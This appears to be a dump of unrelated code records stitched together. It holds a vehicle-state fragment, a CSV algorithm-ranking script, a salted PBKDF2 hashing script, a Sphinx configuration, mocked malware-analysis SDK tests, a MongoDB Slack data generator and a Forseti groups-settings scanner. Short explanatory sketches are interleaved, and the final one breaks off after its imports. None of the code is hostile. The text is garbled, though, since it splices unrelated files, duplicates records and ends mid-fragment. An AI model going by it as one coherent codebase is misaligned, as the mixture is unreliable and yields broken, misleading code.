  def update_speed_kf(self, v_ego_raw):
    if abs(v_ego_raw - self.v_ego_kf.x[0][0]) > 2.0:
      self.v_ego_kf.x = [[v_ego_raw], [0.0]]

    v_ego_x = self.v_ego_kf.update(v_ego_raw)
    return float(v_ego_x[0]), float(v_ego_x[1])

  def update_blinker(self, blinker_time: int, left_blinker_lamp: bool, right_blinker_lamp: bool):
    self.left_blinker_cnt = blinker_time if left_blinker_lamp else max(self.left_blinker_cnt - 1, 0)
    self.right_blinker_cnt = blinker_time if right_blinker_lamp else max(self.right_blinker_cnt - 1, 0)
    return self.left_blinker_cnt > 0, self.right_blinker_cnt > 0

  @staticmethod
  def parse_gear_shifter(gear):
    return {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
            'E': GearShifter.eco, 'T': GearShifter.manumatic, 'D': GearShifter.drive,
            'S': GearShifter.sport, 'L': GearShifter.low, 'B': GearShifter.brake}.get(gear, GearShifter.unknown)

  @staticmethod
  def get_cam_can_parser(CP):
    return None

  @staticmethod
  def get_body_can_parser(CP):
    return None
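update_blinker above is a hold/decay debounce: a lit lamp reloads the counter, an unlit lamp decays it by one frame, so the dark half of a turn-signal blink cycle does not read as "blinker off". A standalone sketch of the same counter logic (frame counts are illustrative, not openpilot's values):

def make_blinker_debounce(hold_frames):
    count = 0
    def update(lamp_on):
        nonlocal count
        # Reload while the lamp is lit; decay by one frame otherwise.
        count = hold_frames if lamp_on else max(count - 1, 0)
        return count > 0
    return update

blinker = make_blinker_debounce(hold_frames=50)
# The lamp toggles every frame, but the debounced state stays True throughout.
states = [blinker(on) for on in [True, False] * 5]
assert all(states)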
| true | true |
f7078ff5d6f47f04b96fa0641ac3d8233e238b90 | 1,868 | py | Python | utils/compute_algorithm_rank.py | aseldawy/deep-spatial-join | ce0e8e08f49b05e972287c6f4f50272735e04e60 | ["Apache-2.0"] | 6 | 2021-12-17T22:19:25.000Z | 2022-03-17T23:35:04.000Z | utils/compute_algorithm_rank.py | aseldawy/deep-spatial-join | ce0e8e08f49b05e972287c6f4f50272735e04e60 | ["Apache-2.0"] | null | null | null | utils/compute_algorithm_rank.py | aseldawy/deep-spatial-join | ce0e8e08f49b05e972287c6f4f50272735e04e60 | ["Apache-2.0"] | 2 | 2021-01-26T04:17:43.000Z | 2021-02-16T16:10:13.000Z |
import operator


def main():
    print('Compute algorithm rank')
    f = open('../data/join_results/sj.12_30.log.csv')
    output_f = open('../data/join_results/sj.12_30.log.ranked.csv', 'w')
    header = f.readline()
    header = header.strip()
    header += ',1st time,2nd time,3rd time,4th time, 1st #splits,2nd #splits,3rd #splits,4th #splits\n'
    output_f.writelines(header)
    line = f.readline()
    while line:
        data = line.strip().split(',')
        duration = {}
        duration['pbsm'] = float(data[9]) if float(data[9]) > 0 else 10000
        duration['dj'] = float(data[13]) if float(data[13]) > 0 else 10000
        duration['repj'] = float(data[17]) if float(data[17]) > 0 else 10000
        duration['bnlj'] = float(data[5]) if float(data[5]) > 0 else 10000
        # print (duration)
        sorted_duration = sorted(duration.items(), key=operator.itemgetter(1))
        # print (sorted_duration)
        line = line.strip()
        for sorted_entry in sorted_duration:
            print(sorted_entry[0])
            line += ',{}'.format(sorted_entry[0])

        split_counts = {}
        split_counts['pbsm'] = float(data[8]) if float(data[8]) > 0 else 10000
        split_counts['dj'] = float(data[12]) if float(data[12]) > 0 else 10000
        split_counts['repj'] = float(data[16]) if float(data[16]) > 0 else 10000
        split_counts['bnlj'] = float(data[4]) if float(data[4]) > 0 else 10000
        print(duration)
        sorted_split_counts = sorted(split_counts.items(), key=operator.itemgetter(1))
        # print (sorted_duration)
        for sorted_entry in sorted_split_counts:
            print(sorted_entry[0])
            line += ',{}'.format(sorted_entry[0])
        output_f.writelines('{}\n'.format(line))
        line = f.readline()
    output_f.close()
    f.close()


if __name__ == '__main__':
    main()
| 36.627451 | 103 | 0.599036 |
import operator


def main():
    print('Compute algorithm rank')
    f = open('../data/join_results/sj.12_30.log.csv')
    output_f = open('../data/join_results/sj.12_30.log.ranked.csv', 'w')
    header = f.readline()
    header = header.strip()
    header += ',1st time,2nd time,3rd time,4th time, 1st #splits,2nd #splits,3rd #splits,4th #splits\n'
    output_f.writelines(header)
    line = f.readline()
    while line:
        data = line.strip().split(',')
        duration = {}
        duration['pbsm'] = float(data[9]) if float(data[9]) > 0 else 10000
        duration['dj'] = float(data[13]) if float(data[13]) > 0 else 10000
        duration['repj'] = float(data[17]) if float(data[17]) > 0 else 10000
        duration['bnlj'] = float(data[5]) if float(data[5]) > 0 else 10000
        sorted_duration = sorted(duration.items(), key=operator.itemgetter(1))
        line = line.strip()
        for sorted_entry in sorted_duration:
            print(sorted_entry[0])
            line += ',{}'.format(sorted_entry[0])

        split_counts = {}
        split_counts['pbsm'] = float(data[8]) if float(data[8]) > 0 else 10000
        split_counts['dj'] = float(data[12]) if float(data[12]) > 0 else 10000
        split_counts['repj'] = float(data[16]) if float(data[16]) > 0 else 10000
        split_counts['bnlj'] = float(data[4]) if float(data[4]) > 0 else 10000
        print(duration)
        sorted_split_counts = sorted(split_counts.items(), key=operator.itemgetter(1))
        for sorted_entry in sorted_split_counts:
            print(sorted_entry[0])
            line += ',{}'.format(sorted_entry[0])
        output_f.writelines('{}\n'.format(line))
        line = f.readline()
    output_f.close()
    f.close()


if __name__ == '__main__':
    main()
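The ranking step above is simply "sort a dict's items by value", with a large sentinel (10000) pushing failed runs (reported as non-positive measurements) to the back. A minimal sketch of the same pattern with made-up numbers:

import operator

durations = {'pbsm': 12.5, 'dj': -1.0, 'repj': 8.2, 'bnlj': 30.1}
# Replace failed runs (values <= 0) with a large sentinel so they rank last.
cleaned = {k: (v if v > 0 else 10000) for k, v in durations.items()}
ranked = [name for name, _ in sorted(cleaned.items(), key=operator.itemgetter(1))]
print(ranked)  # ['repj', 'pbsm', 'bnlj', 'dj']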
| true | true |
f70790bdabc2c7fe01362649f171682a1a2e2577 | 321 | py | Python | 03 - Linux Security/q6/hashme.py | HirumalPriyashan/linux-training | 6ccfe572c0d7d36cb67b685ddb5ee82b5c3667c1 | ["MIT"] | 2 | 2021-09-15T14:21:26.000Z | 2022-01-24T13:14:42.000Z | 03 - Linux Security/q6/hashme.py | HirumalPriyashan/linux-training | 6ccfe572c0d7d36cb67b685ddb5ee82b5c3667c1 | ["MIT"] | null | null | null | 03 - Linux Security/q6/hashme.py | HirumalPriyashan/linux-training | 6ccfe572c0d7d36cb67b685ddb5ee82b5c3667c1 | ["MIT"] | null | null | null |
import sys
import hashlib


def check(args):
    if len(args) != 2:
        print("usage hashme.py <phrase>")
        return False
    return True


def main(phrase):
    salt = 'Km5d5ivMy8iexuHcZrsD'
    hash_obj = hashlib.pbkdf2_hmac('sha512', phrase.encode(), salt.encode(), 200000)
    print(hash_obj.hex())


if check(sys.argv): main(sys.argv[1])
| 21.4
| 81
| 0.71028
|
import sys
import hashlib
def check(args):
if len(args) != 2:
print("usage hashme.py <phrase>")
return False
return True
def main(phrase):
salt = 'Km5d5ivMy8iexuHcZrsD'
hash_obj = hashlib.pbkdf2_hmac('sha512', phrase.encode(), salt.encode(), 200000)
print(hash_obj.hex())
if check(sys.argv): main(sys.argv[1])
| true
| true
|
f707919fa3236f64303228d43dfff91d42e6dab5
| 3,155
|
py
|
Python
|
doc/conf.py
|
mango-db/mut
|
3df98c17b0c5ea0b6101fe2c0e1b36ebdf97412e
|
[
"Apache-2.0"
] | 10
|
2017-05-09T19:38:34.000Z
|
2022-01-21T00:02:03.000Z
|
doc/conf.py
|
mango-db/mut
|
3df98c17b0c5ea0b6101fe2c0e1b36ebdf97412e
|
[
"Apache-2.0"
] | 7
|
2017-08-21T21:41:44.000Z
|
2021-11-19T18:09:13.000Z
|
doc/conf.py
|
mango-db/mut
|
3df98c17b0c5ea0b6101fe2c0e1b36ebdf97412e
|
[
"Apache-2.0"
] | 12
|
2016-10-13T14:42:50.000Z
|
2022-01-13T13:51:53.000Z
|
# -*- coding: utf-8 -*-
#
# MongoDB documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 3 09:58:40 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
import sys
import os
import datetime
from sphinx.errors import SphinxError
try:
tags
except NameError:
class Tags(object):
def has(self, *args):
return False
tags = Tags()
# -- General configuration ----------------------------------------------------
needs_sphinx = '1.0'
extensions = [
'sphinx.ext.extlinks',
'sphinx.ext.todo',
]
locale_dirs = []
gettext_compact = False
templates_path = ['.templates']
exclude_patterns = []
source_suffix = '.txt'
master_doc = 'index'
language = 'en'
project = 'mut'
copyright = u'2008-{0}'.format(datetime.date.today().year)
version = '0.1'
release = '0.1'
rst_epilog = '\n'.join([
'.. |copy| unicode:: U+000A9',
'.. |ent-build| replace:: MongoDB Enterprise',
'.. |year| replace:: {0}'.format(datetime.date.today().year),
])
pygments_style = 'sphinx'
extlinks = {
'issue': ('https://jira.mongodb.org/browse/%s', ''),
'wiki': ('http://www.mongodb.org/display/DOCS/%s', ''),
'api': ('https://api.mongodb.org/%s', ''),
'manual': ('https://docs.mongodb.org/manual%s', ''),
'gettingstarted': ('https://docs.mongodb.org/getting-started%s', ''),
'ecosystem': ('https://docs.mongodb.org/ecosystem%s', ''),
'meta-driver': ('http://docs.mongodb.org/meta-driver/latest%s', ''),
'mms-docs': ('https://docs.cloud.mongodb.com%s', ''),
'mms-home': ('https://cloud.mongodb.com%s', ''),
'opsmgr': ('https://docs.opsmanager.mongodb.com/current%s', ''),
'about': ('https://www.mongodb.org/about%s', ''),
'products': ('https://www.mongodb.com/products%s', '')
}
languages = [
("ar", "Arabic"),
("cn", "Chinese"),
("cs", "Czech"),
("de", "German"),
("es", "Spanish"),
("fr", "French"),
("hu", "Hungarian"),
("id", "Indonesian"),
("it", "Italian"),
("jp", "Japanese"),
("ko", "Korean"),
("lt", "Lithuanian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("tr", "Turkish"),
("uk", "Ukrainian")
]
# -- Options for HTML output ---------------------------------------------------
html_theme = 'nature'
html_title = 'Mut'
htmlhelp_basename = 'MongoDBdoc'
# html_logo = sconf.logo
html_static_path = ['_static']
html_copy_source = False
html_use_smartypants = True
html_domain_indices = True
html_use_index = True
html_split_index = False
html_show_sourcelink = False
html_show_sphinx = True
html_show_copyright = True
html_sidebars = {}
# put it into your conf.py
def setup(app):
# disable versioning for speed
from sphinx.builders.gettext import I18nBuilder
I18nBuilder.versioning_method = 'none'
def doctree_read(app, doctree):
if not isinstance(app.builder, I18nBuilder):
return
from docutils import nodes
from sphinx.versioning import add_uids
list(add_uids(doctree, nodes.TextElement))
app.connect('doctree-read', doctree_read)
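To illustrate how an extlinks entry is consumed, the sketch below expands one role target into a URL the way Sphinx does; 'DOCS-123' is an invented issue key.

# Each extlinks value is a (url_template, caption_prefix) pair; Sphinx
# substitutes the role target into the template with %-formatting.
extlinks = {'issue': ('https://jira.mongodb.org/browse/%s', '')}
url_template, caption_prefix = extlinks['issue']
print(url_template % 'DOCS-123')  # https://jira.mongodb.org/browse/DOCS-123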
| 25.443548
| 80
| 0.602219
|
import sys
import os
import datetime
from sphinx.errors import SphinxError
try:
tags
except NameError:
class Tags(object):
def has(self, *args):
return False
tags = Tags()
needs_sphinx = '1.0'
extensions = [
'sphinx.ext.extlinks',
'sphinx.ext.todo',
]
locale_dirs = []
gettext_compact = False
templates_path = ['.templates']
exclude_patterns = []
source_suffix = '.txt'
master_doc = 'index'
language = 'en'
project = 'mut'
copyright = u'2008-{0}'.format(datetime.date.today().year)
version = '0.1'
release = '0.1'
rst_epilog = '\n'.join([
'.. |copy| unicode:: U+000A9',
'.. |ent-build| replace:: MongoDB Enterprise',
'.. |year| replace:: {0}'.format(datetime.date.today().year),
])
pygments_style = 'sphinx'
extlinks = {
'issue': ('https://jira.mongodb.org/browse/%s', ''),
'wiki': ('http://www.mongodb.org/display/DOCS/%s', ''),
'api': ('https://api.mongodb.org/%s', ''),
'manual': ('https://docs.mongodb.org/manual%s', ''),
'gettingstarted': ('https://docs.mongodb.org/getting-started%s', ''),
'ecosystem': ('https://docs.mongodb.org/ecosystem%s', ''),
'meta-driver': ('http://docs.mongodb.org/meta-driver/latest%s', ''),
'mms-docs': ('https://docs.cloud.mongodb.com%s', ''),
'mms-home': ('https://cloud.mongodb.com%s', ''),
'opsmgr': ('https://docs.opsmanager.mongodb.com/current%s', ''),
'about': ('https://www.mongodb.org/about%s', ''),
'products': ('https://www.mongodb.com/products%s', '')
}
languages = [
("ar", "Arabic"),
("cn", "Chinese"),
("cs", "Czech"),
("de", "German"),
("es", "Spanish"),
("fr", "French"),
("hu", "Hungarian"),
("id", "Indonesian"),
("it", "Italian"),
("jp", "Japanese"),
("ko", "Korean"),
("lt", "Lithuanian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("tr", "Turkish"),
("uk", "Ukrainian")
]
html_theme = 'nature'
html_title = 'Mut'
htmlhelp_basename = 'MongoDBdoc'
html_static_path = ['_static']
html_copy_source = False
html_use_smartypants = True
html_domain_indices = True
html_use_index = True
html_split_index = False
html_show_sourcelink = False
html_show_sphinx = True
html_show_copyright = True
html_sidebars = {}
def setup(app):
from sphinx.builders.gettext import I18nBuilder
I18nBuilder.versioning_method = 'none'
def doctree_read(app, doctree):
if not isinstance(app.builder, I18nBuilder):
return
from docutils import nodes
from sphinx.versioning import add_uids
list(add_uids(doctree, nodes.TextElement))
app.connect('doctree-read', doctree_read)
| true
| true
|
f70791fca69d0f3ad4a9aa5995b5670291a02bb6
| 1,329
|
py
|
Python
|
tests/test_dragonfly.py
|
certego/pydragonfly
|
18dcbd78f07e0b6c09d536d45ba4051106c4f5a5
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_dragonfly.py
|
certego/pydragonfly
|
18dcbd78f07e0b6c09d536d45ba4051106c4f5a5
|
[
"BSD-3-Clause"
] | 15
|
2021-10-21T10:39:23.000Z
|
2022-03-29T04:19:25.000Z
|
tests/test_dragonfly.py
|
certego/pydragonfly
|
18dcbd78f07e0b6c09d536d45ba4051106c4f5a5
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest.mock import patch
from pydragonfly.sdk.const import ANALYZED, MALICIOUS
from tests.mock_utils import MockAPIResponse
from tests.resources import APIResourceBaseTestCase
from tests.resources.test_analysis import AnalysisResultTestCase
class DragonflyTestCase(APIResourceBaseTestCase):
@property
def resource(self):
return self.df
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.create",
return_value=MockAPIResponse({"id": 1}, 200),
)
def test_analyze_file(self, *args, **kwargs):
ret = self.df.analyze_file(
sample_name="test", sample_buffer=b"test_sample", retrieve_analysis=False
)
self.assertEqual(ret, 1)
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.retrieve",
return_value=MockAPIResponse(AnalysisResultTestCase.result_json, 200),
)
@patch(
"pydragonfly.sdk.resources.report.Report.matched_rules",
return_value=MockAPIResponse(AnalysisResultTestCase.matched_rules_json, 200),
)
def test_analysis_result(self, *args, **kwargs):
result = self.df.analysis_result(12)
self.assertEqual(result.id, 12)
self.assertEqual(result.status, ANALYZED)
self.assertEqual(result.evaluation, MALICIOUS)
self.assertEqual(result.score, 10)
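The tests above rely on unittest.mock.patch to intercept SDK calls; the standalone sketch below demonstrates the same pattern with an invented Service class, so nothing here touches the pydragonfly API.

import unittest
from unittest.mock import patch

class Service:
    @staticmethod
    def create():
        raise RuntimeError('would hit the network')

class PatchDemo(unittest.TestCase):
    # While patched, Service.create returns the canned value instead of raising.
    @patch(__name__ + '.Service.create', return_value={'id': 1})
    def test_create_is_intercepted(self, mock_create):
        self.assertEqual(Service.create(), {'id': 1})
        mock_create.assert_called_once()

if __name__ == '__main__':
    unittest.main()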
| 34.973684
| 85
| 0.714823
|
from unittest.mock import patch
from pydragonfly.sdk.const import ANALYZED, MALICIOUS
from tests.mock_utils import MockAPIResponse
from tests.resources import APIResourceBaseTestCase
from tests.resources.test_analysis import AnalysisResultTestCase
class DragonflyTestCase(APIResourceBaseTestCase):
@property
def resource(self):
return self.df
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.create",
return_value=MockAPIResponse({"id": 1}, 200),
)
def test_analyze_file(self, *args, **kwargs):
ret = self.df.analyze_file(
sample_name="test", sample_buffer=b"test_sample", retrieve_analysis=False
)
self.assertEqual(ret, 1)
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.retrieve",
return_value=MockAPIResponse(AnalysisResultTestCase.result_json, 200),
)
@patch(
"pydragonfly.sdk.resources.report.Report.matched_rules",
return_value=MockAPIResponse(AnalysisResultTestCase.matched_rules_json, 200),
)
def test_analysis_result(self, *args, **kwargs):
result = self.df.analysis_result(12)
self.assertEqual(result.id, 12)
self.assertEqual(result.status, ANALYZED)
self.assertEqual(result.evaluation, MALICIOUS)
self.assertEqual(result.score, 10)
| true
| true
|
f70791fdb2757566982298ffb1bbf9b871483305
| 5,722
|
py
|
Python
|
src/generator.py
|
Mtortolani/slack-backend
|
11b1650c111eb163a8ef3bf75a33fb4aeeccf300
|
[
"MIT"
] | null | null | null |
src/generator.py
|
Mtortolani/slack-backend
|
11b1650c111eb163a8ef3bf75a33fb4aeeccf300
|
[
"MIT"
] | null | null | null |
src/generator.py
|
Mtortolani/slack-backend
|
11b1650c111eb163a8ef3bf75a33fb4aeeccf300
|
[
"MIT"
] | null | null | null |
import random
import string
from pymongo import MongoClient
from models.user import User
from models.channel import *
from models.workspace import Workspace
from models.settings import *
# Setup Mongo client
class MongoDatabase:
def __init__(self):
self.client = MongoClient("mongodb://localhost:27017/")
self.db = self.client['slack_database']
self.user_col = self.db['user_col']
self.direct_col = self.db['direct_col']
self.workspace_col = self.db['workspace_col']
class Generator:
def __init__(self):
self.mongo = MongoDatabase()
def generate_random_string(self, size: int=10):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=size))
def generate_random_number(self, size: int=9):
return random.randint(1, 10**size)
def generate_random_message(self):
words = [self.generate_random_string() for i in range(random.randint(3,10))]
return ' '.join(words)
def generate_random_user(self):
name = self.generate_random_string()
user = User(name)
settings = UserSetting()
settings.notifications = self.generate_notifications()
settings.language = self.generate_random_language()
settings.time_zone = self.generate_random_timezone()
user.settings = settings
return user
def generate_random_channel(self):
name = self.generate_random_string()
channel = Channel(name)
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
channel.settings = settings
return channel
def generate_random_direct_channel(self, n_messages: int = 10):
user_pair = [i for i in self.mongo.user_col.aggregate([{'$sample':{'size':2}}])]
dc = DirectChannel(user_pair[0], user_pair[1])
dc.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
dc.archive = self.generate_random_archive()
dc.messages = [self.generate_random_message() for _ in range(n_messages)]
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
dc.settings = settings
return dc
def generate_random_workspace(self, n_users: int = 10, n_channels: int = 10, n_msgs_per_chnl: int = 20):
workspace_name = self.generate_random_string()
workspace = Workspace(workspace_name)
workspace.member_ids = [i['user_id'] for i in self.mongo.user_col.aggregate([{'$sample':{'size':n_users}}])]
workspace.channels = [self.generate_random_channel() for _ in range(n_channels)]
for channel in workspace.channels:
channel.name = self.generate_random_string()
channel.messages = [self.generate_random_message() for _ in range(n_msgs_per_chnl)]
return workspace
# For Settings
def generate_random_language(self):
language_list = ["German","English","Spanish","French","Italian","Portuguese","Russian","Japanese","Chinese","Korean"]
return random.choice(language_list)
def generate_random_timezone(self):
timezones = ['EST', 'CST', 'MST', 'PST', 'AST', 'AKST', 'HST']
return random.choice(timezones)
def generate_notifications(self):
return bool(random.getrandbits(1))
def generate_random_archive(self):
return bool(random.getrandbits(1))
def random_data_test(user_count: int=1000, workspace_count: int=100, channel_count: int=5,
direct_channel_count: int=400, n_msgs_per_chnl: int=50):
'''
Creates a database with the given number of users, workspaces, channels in each workspace, direct channels for each user, and messages by each user
'''
g = Generator()
mongo = MongoDatabase()
# make users
for _ in range(user_count):
user = g.generate_random_user()
mongo.user_col.insert_one({
'user_id': user.user_id,
'name': user.name,
'settings': {'notifications': user.settings.notifications,
'language': user.settings.language,
'time_zone': user.settings.time_zone}})
# make direct channels with messages
for _ in range(direct_channel_count):
dc = g.generate_random_direct_channel(n_msgs_per_chnl)
mongo.direct_col.insert_one({'member_ids': list(dc.member_ids), # NOTE: CHANGING FROM SET To LIST
'messages': dc.messages,
'settings':{'censored_words': list(dc.settings.censored_words), # NOTE: CHANGING FROM SET To LIST
'archive': dc.settings.archive}})
# make workspaces with members and channels and messages
for _ in range(workspace_count):
workspace = g.generate_random_workspace(10, channel_count, n_msgs_per_chnl)
mongo.workspace_col.insert_one({'name':workspace.name,
'members':workspace.member_ids,
'channels': {channel.name: channel.messages for channel in workspace.channels},})
# TODO: Insert settings into workspace channels
def main():
mongo = MongoDatabase()
mongo.client.drop_database('slack_database')
random_data_test()
if __name__ == '__main__':
main()
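The string and message generators above need no database to demonstrate; this dependency-free sketch mirrors their defaults (10-character tokens, 3 to 10 words per message).

import random
import string

def generate_random_string(size=10):
    # Lowercase letters and digits, matching Generator.generate_random_string.
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=size))

def generate_random_message():
    return ' '.join(generate_random_string() for _ in range(random.randint(3, 10)))

print(generate_random_message())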
| 41.165468
| 151
| 0.653792
|
import random
import string
from pymongo import MongoClient
from models.user import User
from models.channel import *
from models.workspace import Workspace
from models.settings import *
class MongoDatabase:
def __init__(self):
self.client = MongoClient("mongodb://localhost:27017/")
self.db = self.client['slack_database']
self.user_col = self.db['user_col']
self.direct_col = self.db['direct_col']
self.workspace_col = self.db['workspace_col']
class Generator:
def __init__(self):
self.mongo = MongoDatabase()
def generate_random_string(self, size: int=10):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=size))
def generate_random_number(self, size: int=9):
return random.randint(1, 10**size)
def generate_random_message(self):
words = [self.generate_random_string() for i in range(random.randint(3,10))]
return ' '.join(words)
def generate_random_user(self):
name = self.generate_random_string()
user = User(name)
settings = UserSetting()
settings.notifications = self.generate_notifications()
settings.language = self.generate_random_language()
settings.time_zone = self.generate_random_timezone()
user.settings = settings
return user
def generate_random_channel(self):
name = self.generate_random_string()
channel = Channel(name)
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
channel.settings = settings
return channel
def generate_random_direct_channel(self, n_messages: int = 10):
user_pair = [i for i in self.mongo.user_col.aggregate([{'$sample':{'size':2}}])]
dc = DirectChannel(user_pair[0], user_pair[1])
dc.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
dc.archive = self.generate_random_archive()
dc.messages = [self.generate_random_message() for _ in range(n_messages)]
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
dc.settings = settings
return dc
def generate_random_workspace(self, n_users: int = 10, n_channels: int = 10, n_msgs_per_chnl: int = 20):
workspace_name = self.generate_random_string()
workspace = Workspace(workspace_name)
workspace.member_ids = [i['user_id'] for i in self.mongo.user_col.aggregate([{'$sample':{'size':n_users}}])]
workspace.channels = [self.generate_random_channel() for _ in range(n_channels)]
for channel in workspace.channels:
channel.name = self.generate_random_string()
channel.messages = [self.generate_random_message() for _ in range(n_msgs_per_chnl)]
return workspace
def generate_random_language(self):
language_list = ["German","English","Spanish","French","Italian","Portuguese","Russian","Japanese","Chinese","Korean"]
return random.choice(language_list)
def generate_random_timezone(self):
timezones = ['EST', 'CST', 'MST', 'PST', 'AST', 'AKST', 'HST']
return random.choice(timezones)
def generate_notifications(self):
return bool(random.getrandbits(1))
def generate_random_archive(self):
return bool(random.getrandbits(1))
def random_data_test(user_count: int=1000, workspace_count: int=100, channel_count: int=5,
direct_channel_count: int=400, n_msgs_per_chnl: int=50):
g = Generator()
mongo = MongoDatabase()
for _ in range(user_count):
user = g.generate_random_user()
mongo.user_col.insert_one({
'user_id': user.user_id,
'name': user.name,
'settings': {'notifications': user.settings.notifications,
'language': user.settings.language,
'time_zone': user.settings.time_zone}})
for _ in range(direct_channel_count):
dc = g.generate_random_direct_channel(n_msgs_per_chnl)
mongo.direct_col.insert_one({'member_ids': list(dc.member_ids), 'messages': dc.messages,
'settings':{'censored_words': list(dc.settings.censored_words), 'archive': dc.settings.archive}})
for _ in range(workspace_count):
workspace = g.generate_random_workspace(10, channel_count, n_msgs_per_chnl)
mongo.workspace_col.insert_one({'name':workspace.name,
'members':workspace.member_ids,
'channels': {channel.name: channel.messages for channel in workspace.channels},})
def main():
mongo = MongoDatabase()
mongo.client.drop_database('slack_database')
random_data_test()
if __name__ == '__main__':
main()
| true
| true
|
f7079305ae82d491841a452c63bc1084747dc7d0
| 6,620
|
py
|
Python
|
google/cloud/forseti/scanner/scanners/groups_settings_scanner.py
|
darrellkuhn/forseti-security
|
b54faf68d869842e8a43472ff980e28e2ce8d3c6
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/forseti/scanner/scanners/groups_settings_scanner.py
|
darrellkuhn/forseti-security
|
b54faf68d869842e8a43472ff980e28e2ce8d3c6
|
[
"Apache-2.0"
] | 1
|
2020-11-10T22:15:54.000Z
|
2020-11-10T22:15:54.000Z
|
google/cloud/forseti/scanner/scanners/groups_settings_scanner.py
|
darrellkuhn/forseti-security
|
b54faf68d869842e8a43472ff980e28e2ce8d3c6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scanner for the GroupsSettings rules engine."""
import json
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import groups_settings_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class GroupsSettingsScanner(base_scanner.BaseScanner):
"""Scanner for GroupsSettings data."""
def __init__(self, global_configs, scanner_configs, service_config,
model_name, snapshot_timestamp, rules):
"""Initialization.
Args:
global_configs (dict): Global configurations.
scanner_configs (dict): Scanner configurations.
service_config (ServiceConfig): Forseti 2.0 service configs
model_name (str): name of the data model
snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ.
rules (str): Fully-qualified path and filename of the rules file.
"""
super(GroupsSettingsScanner, self).__init__(
global_configs,
scanner_configs,
service_config,
model_name,
snapshot_timestamp,
rules)
self.rules_engine = (groups_settings_rules_engine.
GroupsSettingsRulesEngine(
rules_file_path=self.rules,
snapshot_timestamp=self.snapshot_timestamp))
self.rules_engine.build_rule_book(self.global_configs)
@staticmethod
def _flatten_violations(violations):
"""Flatten RuleViolations into a dict for each RuleViolation member.
Args:
violations (list): The RuleViolations to flatten.
Yields:
dict: Iterator of RuleViolations as a dict per member.
"""
for violation in violations:
resource_data = {
'whoCanAdd': violation.whoCanAdd,
'whoCanJoin': violation.whoCanJoin,
'whoCanViewMembership': violation.whoCanViewMembership,
'whoCanViewGroup': violation.whoCanViewGroup,
'whoCanInvite': violation.whoCanInvite,
'allowExternalMembers': violation.allowExternalMembers,
'whoCanLeaveGroup': violation.whoCanLeaveGroup,
}
yield {
'resource_id': violation.group_email,
'full_name': violation.group_email,
'resource_name': violation.group_email,
'resource_data': json.dumps(resource_data, sort_keys=True),
'violation_data': violation.violation_reason,
'resource_type': violation.resource_type,
'rule_index': violation.rule_index,
'rule_name': violation.rule_name,
'violation_type': violation.violation_type,
}
def _output_results(self, all_violations):
"""Output results.
Args:
all_violations (list): All violations.
"""
all_violations = list(self._flatten_violations(all_violations))
self._output_results_to_db(all_violations)
def _find_violations(self, all_groups_settings, iam_groups_settings):
"""Find violations in the settings.
Args:
all_groups_settings (list): GroupsSettings list to find violations
in.
iam_groups_settings (list): GroupsSettings list for only those
groups settings that have at least 1 iam policy, to find violations
in.
Returns:
list: All violations.
"""
all_violations = []
LOGGER.info('Finding groups settings violations...')
for settings in all_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=False)
LOGGER.debug(violations)
all_violations.extend(violations)
for settings in iam_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=True)
LOGGER.debug(violations)
all_violations.extend(violations)
return all_violations
def _retrieve(self):
"""Runs the data collection.
Returns:
tuple: 2 lists of GroupsSettings objects, 1 only for settings that
have iam policies and 1 with all groups settings.
Raises:
ValueError: if resources have an unexpected type.
"""
all_groups_settings = []
iam_groups_settings = []
model_manager = self.service_config.model_manager
scoped_session, data_access = model_manager.get(self.model_name)
with scoped_session as session:
for settings in data_access.scanner_fetch_groups_settings(session,
True):
email = settings[0].split('group/')[1]
iam_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
for settings in data_access.scanner_fetch_groups_settings(session,
False):
email = settings[0].split('group/')[1]
all_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
return (all_groups_settings, iam_groups_settings)
def run(self):
"""Run, the entry point for this scanner."""
all_groups_settings, iam_groups_settings = self._retrieve()
all_violations = self._find_violations(all_groups_settings,
iam_groups_settings)
self._output_results(all_violations)
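The _flatten_violations generator is the heart of the scanner's output path; the reduced sketch below shows the same record-flattening idea with an invented three-field RuleViolation, independent of the Forseti libraries.

import json
from collections import namedtuple

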